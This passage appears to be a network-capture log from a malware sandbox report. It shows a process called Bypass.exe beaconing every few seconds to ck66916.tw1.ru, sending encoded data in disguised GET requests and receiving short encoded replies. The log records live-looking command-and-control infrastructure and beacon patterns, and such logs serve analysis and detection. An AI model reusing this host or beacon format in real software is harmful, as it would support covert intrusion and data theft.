                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        27192.168.2.44977592.53.96.121807004C:\ProgramData\SoftwareDistribution\Bypass.exe
                        TimestampBytes transferredDirectionData
                        Jun 23, 2024 06:56:39.105926991 CEST2247OUTGET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED]
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: ck66916.tw1.ru
                        Connection: Keep-Alive
                        Jun 23, 2024 06:56:39.836620092 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:56:39 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        28192.168.2.44977692.53.96.121807004C:\ProgramData\SoftwareDistribution\Bypass.exe
                        TimestampBytes transferredDirectionData
                        Jun 23, 2024 06:56:44.856257915 CEST2223OUTGET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED]
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: ck66916.tw1.ru
                        Jun 23, 2024 06:56:45.564608097 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:56:45 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        29192.168.2.44977792.53.96.121807004C:\ProgramData\SoftwareDistribution\Bypass.exe
                        TimestampBytes transferredDirectionData
                        Jun 23, 2024 06:56:50.574568987 CEST2247OUTGET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED]
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: ck66916.tw1.ru
                        Connection: Keep-Alive
                        Jun 23, 2024 06:56:51.263937950 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:56:51 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        30192.168.2.44977892.53.96.121807004C:\ProgramData\SoftwareDistribution\Bypass.exe
                        TimestampBytes transferredDirectionData
                        Jun 23, 2024 06:56:56.277299881 CEST2247OUTGET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED]
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: ck66916.tw1.ru
                        Connection: Keep-Alive
                        Jun 23, 2024 06:56:56.977318048 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:56:56 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        31192.168.2.44977992.53.96.121807004C:\ProgramData\SoftwareDistribution\Bypass.exe
                        TimestampBytes transferredDirectionData
                        Jun 23, 2024 06:57:02.002727985 CEST2223OUTGET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED]
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: ck66916.tw1.ru
                        Jun 23, 2024 06:57:02.705717087 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:57:02 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye
                        Jun 23, 2024 06:57:02.943653107 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:57:02 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        32192.168.2.44978092.53.96.121807004C:\ProgramData\SoftwareDistribution\Bypass.exe
                        TimestampBytes transferredDirectionData
                        Jun 23, 2024 06:57:07.715639114 CEST2220OUTGET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=0VfiIiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2 [TRUNCATED]
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: ck66916.tw1.ru
                        Connection: Keep-Alive
                        Jun 23, 2024 06:57:08.414673090 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:57:08 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        33192.168.2.44978192.53.96.121807004C:\ProgramData\SoftwareDistribution\Bypass.exe
                        TimestampBytes transferredDirectionData
                        Jun 23, 2024 06:57:13.436690092 CEST2247OUTGET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED]
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: ck66916.tw1.ru
                        Connection: Keep-Alive
                        Jun 23, 2024 06:57:14.127618074 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:57:14 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        34192.168.2.44978292.53.96.121807004C:\ProgramData\SoftwareDistribution\Bypass.exe
                        TimestampBytes transferredDirectionData
                        Jun 23, 2024 06:57:19.136914015 CEST2223OUTGET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED]
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: ck66916.tw1.ru
                        Jun 23, 2024 06:57:19.835242987 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:57:19 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        35192.168.2.44978392.53.96.121807004C:\ProgramData\SoftwareDistribution\Bypass.exe
                        TimestampBytes transferredDirectionData
